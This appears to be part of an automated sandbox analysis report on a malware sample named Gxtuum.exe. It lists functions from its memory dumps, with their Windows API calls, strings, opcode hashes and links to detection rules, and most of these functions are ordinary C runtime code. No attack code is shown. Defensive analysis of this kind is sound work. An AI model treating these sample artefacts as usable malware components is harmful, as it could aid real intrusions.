__Mtx_unlock.LIBCPMT ref: 00102EB5

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
String ID:
API String ID: 3990724213-0
Opcode ID: d277154daf88329b674f290a4d6c86f798ab51c1ad914dbaaf3a8fc0bc1f5655
Instruction ID: 15195f0fa839e57e282ec7001ead58c21d86a89d1d07c54088959a2f769d770c
Opcode Fuzzy Hash: d277154daf88329b674f290a4d6c86f798ab51c1ad914dbaaf3a8fc0bc1f5655
Instruction Fuzzy Hash: 50B102B1D006099FDB24DF74C949BAEBBB4FF15300F00452EE896A76D2DBB1A944CB91

Function 00109BC6 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00109C0F
__alloca_probe_16.LIBCMT ref: 00109C3B
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00109C7A
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00109C97
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00109CD6
__alloca_probe_16.LIBCMT ref: 00109CF3
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00109D35
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00109D58

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: c831b13493e5f05db061a76ba83af6a9856d24743362f0fdefc1ce4d45533068
Instruction ID: 670b2ea869d78fd9cae5cfe459dcde6eeaf1aaccf7e4917ae34e69433a2570eb
Opcode Fuzzy Hash: c831b13493e5f05db061a76ba83af6a9856d24743362f0fdefc1ce4d45533068
Instruction Fuzzy Hash: 3751AC7294020ABBEF208FA1DC55FAF7BA9EF44750F254129F951D61A2E7B1CD10CBA0

Function 00115D60 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001171C0: GetLastError.KERNEL32(?,?,?,0010E627,?,?,?,?,0010F4C2,?), ref: 001171C5
Part of subcall function 001171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0010E627,?,?,?,?,0010F4C2,?), ref: 00117263

_free.LIBCMT ref: 0011604B
_free.LIBCMT ref: 00116064
_free.LIBCMT ref: 001160A2
_free.LIBCMT ref: 001160AB
_free.LIBCMT ref: 001160B7

Strings

C, xrefs: 00115EBC

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: b23dde285395668fe7ff410fcdff245196b0b0e3beeb68d9de2f4aec8b464dd9
Instruction ID: 51946bf4af9f1fdb60f0cc10d0708ed8e111091c67501ba572bd8d30fad8d74e
Opcode Fuzzy Hash: b23dde285395668fe7ff410fcdff245196b0b0e3beeb68d9de2f4aec8b464dd9
Instruction Fuzzy Hash: 00B1397590161ADFDB28DF18C884AEDB3B5FF58304F5085AAE849A7290E771AED0CF40

Function 000F2260 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

list too long, xrefs: 000F26F9

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID: list too long
API String ID: 0-1124181908
Opcode ID: 4dcc8370309c6bd5bd2bc5877a69160d46b2518ce4cdb579ae6c87c14f760cfb
Instruction ID: 62348883b0880ef16c30ee82e33ed9b416931b5443cfcccb52564900bb9cfeb2
Opcode Fuzzy Hash: 4dcc8370309c6bd5bd2bc5877a69160d46b2518ce4cdb579ae6c87c14f760cfb
Instruction Fuzzy Hash: 1151B1B4D047189BDB10DF64DD85B9AF7F4FF14310F0042A9E948AB691DB70AA81CF51

Function 0010CBE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0010CC17
___except_validate_context_record.LIBVCRUNTIME ref: 0010CC1F
_ValidateLocalCookies.LIBCMT ref: 0010CCA8
__IsNonwritableInCurrentImage.LIBCMT ref: 0010CCD3
_ValidateLocalCookies.LIBCMT ref: 0010CD28

Strings

csm, xrefs: 0010CCBD

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 584c73fdcdb05d76815fabc3bd9f3bcdb154938fbbdf0d0bdc6cf9e40b59f1de
Instruction ID: b8730794b83aed571cc29ed6be402cfceb68a295a8ed8995bef0c73447758634
Opcode Fuzzy Hash: 584c73fdcdb05d76815fabc3bd9f3bcdb154938fbbdf0d0bdc6cf9e40b59f1de
Instruction Fuzzy Hash: 7941E434A002199BCF00EFA8C881A9EBBB5FF45324F148255E859AB3D2D7B1DA05CFD1

Function 001217D6 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00121522: _free.LIBCMT ref: 00121547

_free.LIBCMT ref: 00121824

Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE

_free.LIBCMT ref: 0012182F
_free.LIBCMT ref: 0012183A
_free.LIBCMT ref: 0012188E
_free.LIBCMT ref: 00121899
_free.LIBCMT ref: 001218A4
_free.LIBCMT ref: 001218AF

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
Instruction ID: af356fa42009798e60cc4f6803258244cbb6eabeeb505adb44c4226e39960f38
Opcode Fuzzy Hash: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
Instruction Fuzzy Hash: 79117F32941B14BAD530FBB0DC47FCBB7DDAFA5700F804C24B29BA6052DB24F6554650

Function 000FCA6E Relevance: 9.4, APIs: 6, Instructions: 418COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9a29fe7c454f9e59b1c79defdb67cb8f1ace3124f6204779d4e3c708724210
Instruction ID: e11fc1f474df2db8064ab44b08900854c3757fa641b0087c59f34fdb22cf642e
Opcode Fuzzy Hash: cd9a29fe7c454f9e59b1c79defdb67cb8f1ace3124f6204779d4e3c708724210
Instruction Fuzzy Hash: 24E18971A0024C9BEF18DF68CD4ABBDBB72AF40300F64811CF545A76C2CBB59A84CB91

Function 00117B5F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00117BA7
__fassign.LIBCMT ref: 00117D8C
__fassign.LIBCMT ref: 00117DA9
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00117DF1
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00117E31
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00117ED9

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 1d582132f2e86abb71c9d0c19b36fc5fa9f388bb8b378f3599fe7f5c4fb8603f
Instruction ID: f325c1b52732f2ade0ea2b56702e023a8ef2b94442e3b24a2b3cfda6e691a660
Opcode Fuzzy Hash: 1d582132f2e86abb71c9d0c19b36fc5fa9f388bb8b378f3599fe7f5c4fb8603f
Instruction Fuzzy Hash: A6C18D75D092589FCB18CFE8D8809EDBBF5AF59304F2841AAE855B7381D7319D82CB60

Function 00104B70 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00104BA5
std::_Lockit::_Lockit.LIBCPMT ref: 00104BC7
std::_Lockit::~_Lockit.LIBCPMT ref: 00104BE7
__Getctype.LIBCPMT ref: 00104C7D
std::_Facet_Register.LIBCPMT ref: 00104C9C
std::_Lockit::~_Lockit.LIBCPMT ref: 00104CB4

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 7bfc0a7a250bd98fc69d2362d30fff25caccca24b5cc0f5609841732e373f850
Instruction ID: 6396b66ffb2b629aea17262d6c08dbbcf950cd70c82143d6483110cea3279714
Opcode Fuzzy Hash: 7bfc0a7a250bd98fc69d2362d30fff25caccca24b5cc0f5609841732e373f850
Instruction Fuzzy Hash: A141EFB0D052148FDB25DF54C980AAEB7F0EF65710F14816DE885AB291DBB0AE41CB80

Function 0010CDA4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0010CD9B,0010B434,00108149,07E9847F,?,?,?,00000000,0012CE07,000000FF,?,000E2576,?,?), ref: 0010CDB2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0010CDC0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0010CDD9
SetLastError.KERNEL32(00000000,?,00000000,0012CE07,000000FF,?,000E2576,?,?,?,000E3BA5,00000000,?,00000000,0012C7A0,000000FF), ref: 0010CE2B

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: eddba5d504619df100807c6694ad3f8fe9c7febc8fc8cd1561bb9eae5b867667
Instruction ID: 62df7a1b25fd168e0736f5d8d9736ccd105d227204d4c8ae8e0343f5049f3dd0
Opcode Fuzzy Hash: eddba5d504619df100807c6694ad3f8fe9c7febc8fc8cd1561bb9eae5b867667
Instruction Fuzzy Hash: 1C01F73A20C3226EE62827F4BC865572F44EB53B7A330033AF555854F2EFD14C82AAC1

Function 0011FA37 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, xrefs: 0011FA3C

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
API String ID: 0-1719652438
Opcode ID: 552a1fe6eb7c5d9877c09fa0bb41a6522d9c0de427a3fecec861b8b1fd73cc4e
Instruction ID: 0a16cb424732bf75f794bdc2573a76de82e68b4003b28ebe3485d2ac29d04f5d
Opcode Fuzzy Hash: 552a1fe6eb7c5d9877c09fa0bb41a6522d9c0de427a3fecec861b8b1fd73cc4e
Instruction Fuzzy Hash: 5821F271200206BF9B28AF64AC809EBB7ACEF10364725413CF96DCB190DB75DCC187A0

Function 0010DDF7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,0010DEB8,?,?,00000000,?,?,0010DF6A,00000002,FlsGetValue,001333D8,001333E0,?), ref: 0010DE87

Strings

api-ms-, xrefs: 0010DE47

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 1bacbfb87c9b143c057d81b260fb57016a62a71a35dc66335a6fafe5a734f1eb
Instruction ID: 7ff05bdb137b88191909e55fc68cf6957304ecba2a57e075cd835fa4d2e95e7c
Opcode Fuzzy Hash: 1bacbfb87c9b143c057d81b260fb57016a62a71a35dc66335a6fafe5a734f1eb
Instruction Fuzzy Hash: 3D11C631A41221BBDF224BB8EC45B5A7794AF25B70F260220FD51EF2C0D7B0ED4086D4

Function 0010E292 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0010E287,?,?,0010E24F,?,?,?), ref: 0010E2A7
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0010E2BA
FreeLibrary.KERNEL32(00000000,?,?,0010E287,?,?,0010E24F,?,?,?), ref: 0010E2DD

Strings

CorExitProcess, xrefs: 0010E2B2
mscoree.dll, xrefs: 0010E2A0

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 140cbcf31cddbefdfac5b30fa5cb9a4f63d4862c49c5a0a343b1d8ac611286b1
Instruction ID: b08d25d593ff054763ea55c32dbb6d13d30d2d156384adbc18996e1b9fffb184
Opcode Fuzzy Hash: 140cbcf31cddbefdfac5b30fa5cb9a4f63d4862c49c5a0a343b1d8ac611286b1
Instruction Fuzzy Hash: 9EF03031A44219FBDB11AB51ED0ABDEBEB9EF00756F104060F901E25A0CBB58F40DB95

Function 00127D2C Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00127DCF
__alloca_probe_16.LIBCMT ref: 00127E85
__alloca_probe_16.LIBCMT ref: 00127F1B
__freea.LIBCMT ref: 00127F86
__freea.LIBCMT ref: 00127F92

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 55b4e77b6a27666cf0bc193f5e99abec728bc60178962cd8842f5d253d6613eb
Instruction ID: 66976df8d5d450776baf7ae9f74bf6d5260234ae31b7d3d6339bfeac9f5fb5b0
Opcode Fuzzy Hash: 55b4e77b6a27666cf0bc193f5e99abec728bc60178962cd8842f5d253d6613eb
Instruction Fuzzy Hash: E981B17290C239ABDF259FA4A941AEF7BB6AF09310F190195E810A72C1E7319C60C7B0

Function 000FC950 Relevance: 7.7, APIs: 5, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1108d4a3568cb09aef85ed022a920e33bc5de686c1c8e46f3001e677a8f36aa2
Instruction ID: b8eb0d5540ca35009ec4f40a9b9e87a4bb4a535c74069c8f637bb4723429c4d5
Opcode Fuzzy Hash: 1108d4a3568cb09aef85ed022a920e33bc5de686c1c8e46f3001e677a8f36aa2
Instruction Fuzzy Hash: 8281C2B0A0024CEFEF14DFA8C94ABEEBBB5EF05304F544158E941676C2D7B55A44CBA2

Function 0011C826 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0011C8AA
__alloca_probe_16.LIBCMT ref: 0011C970
__freea.LIBCMT ref: 0011C9DC

Part of subcall function 001187D5: HeapAlloc.KERNEL32(00000000,?,?,?,0011FF40,00000220,?,?,?,?,?,?,0010F4C2,?), ref: 00118807

__freea.LIBCMT ref: 0011C9E5
__freea.LIBCMT ref: 0011CA08

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: b78ff9a1162aaffd0fc4a418809ef60e0a91f129696e310d3de8a9eba3f0bcf6
Instruction ID: 874f891fe1372c21e0d2f283cdf5ffeb81003457e1a7453880b44728dad860a0
Opcode Fuzzy Hash: b78ff9a1162aaffd0fc4a418809ef60e0a91f129696e310d3de8a9eba3f0bcf6
Instruction Fuzzy Hash: 9C51907258021AAFDB299E948C82EFF37AAEF54754F254139F904E7140EB71DC9187E0

Function 001158D5 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001187D5: HeapAlloc.KERNEL32(00000000,?,?,?,0011FF40,00000220,?,?,?,?,?,?,0010F4C2,?), ref: 00118807

_free.LIBCMT ref: 001159E4
_free.LIBCMT ref: 001159FB
_free.LIBCMT ref: 00115A18
_free.LIBCMT ref: 00115A33
_free.LIBCMT ref: 00115A4A

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$AllocHeap
String ID:
API String ID: 1835388192-0
Opcode ID: 969deb2e3e69092609fbb7f8b3f597066b92db7339eab202b9b9f02cd3e5195d
Instruction ID: 8b17ba3761a40a20a38da10916b4ea71081da0c28e9052c55f39dbd69bcce02f
Opcode Fuzzy Hash: 969deb2e3e69092609fbb7f8b3f597066b92db7339eab202b9b9f02cd3e5195d
Instruction Fuzzy Hash: A6510431A00708EFDB29DF69DC81AAAB3F6EF94724F004679E405D7251E731EA818B50

Function 00107500 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00107689
__Mtx_unlock.LIBCPMT ref: 0010769A
__Cnd_broadcast.LIBCPMT ref: 001076C0
__Mtx_unlock.LIBCPMT ref: 001076C6
Concurrency::cancel_current_task.LIBCPMT ref: 0010770F

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
String ID:
API String ID: 3354401312-0
Opcode ID: 43b7aa521603b0595b701a75a9f12594dc4effc362434c999e76b1252fff7a20
Instruction ID: bf3c2a2986b4e433c90e86415bfc079f80682a7175fcaef0c03bb4692545e78e
Opcode Fuzzy Hash: 43b7aa521603b0595b701a75a9f12594dc4effc362434c999e76b1252fff7a20
Instruction Fuzzy Hash: 62617AB0D05209DFDB14DFA4C954BAEBBB8BF05304F104169E845AB382DBB5AA05CFA0

Function 00110BFC Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00110B2E), ref: 00110C1E
GetFileInformationByHandle.KERNEL32(?,?), ref: 00110C78
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00110B2E,?,000000FF,00000000,00000000), ref: 00110D06
__dosmaperr.LIBCMT ref: 00110D0D
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00110D4A

Part of subcall function 00110F72: __dosmaperr.LIBCMT ref: 00110FA7

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
